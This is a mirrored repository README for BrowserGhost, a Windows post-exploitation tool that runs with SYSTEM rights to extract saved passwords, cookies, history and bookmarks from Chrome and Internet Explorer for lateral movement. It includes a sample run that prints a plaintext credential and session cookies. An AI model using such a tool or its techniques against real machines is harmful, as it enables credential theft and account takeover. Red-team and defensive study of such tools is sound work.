qwqdanchun
/
BrowserGhost
mirror of https://github.com/qwqdanchun/BrowserGhost.git
1
0
Fork 0
Code Issues Projects Releases Wiki Activity
BrowserGhost/README.md

126 lines
4.0 KiB
Markdown
Raw Permalink Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# BrowserGhost
## 介绍:
这是一个抓取浏览器密码的工具,后续会添加更多功能
## 当前已经完成的功能:
- 实现system抓机器上其他用户的浏览器密码(方便横向移动时快速凭据采集)
- 用.net2 实现可兼容大部分windows并去掉依赖(不需要System.Data.SQLite.dll这些累赘)
- 可以解密chrome全版本密码(chrome80版本后加密方式变了)
- Chrome已经可以获取login data、cookie、history、book了
- IE 支持获取书签、密码、history了 (.net2提取密码太复杂了代码参考至`https://github.com/djhohnstein/SharpWeb/raw/master/Edge/SharpEdge.cs`)
## 即将去做:
- system权限下获取IE History有点问题
- 优化输出
- 监控实时cookie
- 兼容其他主流浏览器(firefox、360极速浏览器等)
```
C:\Users\Administrator\Desktop>BrowserGhost.exe
[+] Current user Administrator
[*] [4764] [explorer] [Administrator]
[*] Impersonate user Administrator
[*] Current user Administrator
===============Chrome=============
[*]Get Chrome Login Data
[+] Copy C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Login Data to C:\Users\Administrator\AppData\Local\Temp\tmp6B9F.tmp
[URL] -> https://xui.ptlogin2.qq.com/cgi-bin/xlogin
[USERNAME] -> n0thing@gmail.com
[PASSWORD] -> Iloveprettygirls
[+] Delete File C:\Users\Administrator\AppData\Local\Temp\tmp6B9F.tmp
[*]Get Chrome Bookmarks
{
"checksum": "eee70b132cc4f9644d01f989e18fdb38",
"roots": {
"bookmark_bar": {
"children": [ {
"date_added": "13236861887917624",
"guid": "c5df2041-d745-4173-af39-b5c48f8d98a2",
"id": "5",
"name": "GitHub",
"type": "url",
"url": "https://github.com/"
} ],
"date_added": "13236861618031351",
"date_modified": "13236861887917624",
"guid": "00000000-0000-4000-a000-000000000002",
"id": "1",
"name": "书签栏",
"type": "folder"
},
"other": {
"children": [ ],
"date_added": "13236861618031378",
"date_modified": "0",
"guid": "00000000-0000-4000-a000-000000000003",
"id": "2",
"name": "其他书签",
"type": "folder"
},
"synced": {
"children": [ ],
"date_added": "13236861618031381",
"date_modified": "0",
"guid": "00000000-0000-4000-a000-000000000004",
"id": "3",
"name": "移动设备书签",
"type": "folder"
}
},
"version": 1
}
[*]Get Chrome Cookie
[+] Copy C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Cookies to C:\Users\Administrator\AppData\Local\Temp\tmp6D94.tmp
[github.com] _device_id=516175fxxxxxxxxx90133c2
[.github.com] _octo=GH1.1.3xxxxxxxxx5173
[.google.com] NID=204=DEIRBPT8FML_IsHGv1B2xxxxxxxxxxxxxxxxxxxSRlaNRV3-nfhFV8aHAgO6Smtf4JXQqR-W63p0KOVKgVd0VCXv4bKww97DEhc-PI1sVdbD4hGOuVwchN4Bwo-V61AtfjZM
[+] Delete File C:\Users\Administrator\AppData\Local\Temp\tmp6D94.tmp
[*]Get Chrome History
[+] Copy C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\History to C:\Users\Administrator\AppData\Local\Temp\tmp6E32.tmp
http://github.com/ The worlds leading software development platform · GitHub
https://github.com/ GitHub
https://github.com/login Sign in to GitHub · GitHub
[+] Delete File C:\Users\Administrator\AppData\Local\Temp\tmp6E32.tmp
===============IE=============
[*]Get IE Books
C:\Users\Administrator\Favorites\Sign in to GitHub · GitHub.url
URL=https://github.com/session
[*]Get IE Password
Vault Type : Web Credentials
Resource : https://github.com/
Identity : n0thing@gmail.com
Credential : Iloveprettygirls
LastModified : 2020/6/17 7:08:50
[*]Get IE History
https://github.com/login
https://github.com/join
https://github.com/john
https://github.com/sign
http://github.com/
http://go.microsoft.com/fwlink/p/?LinkId=255141
[*] Recvtoself
[*] Current user Administrator
```
![](2.png)
Reference in New Issue View Git Blame Copy Permalink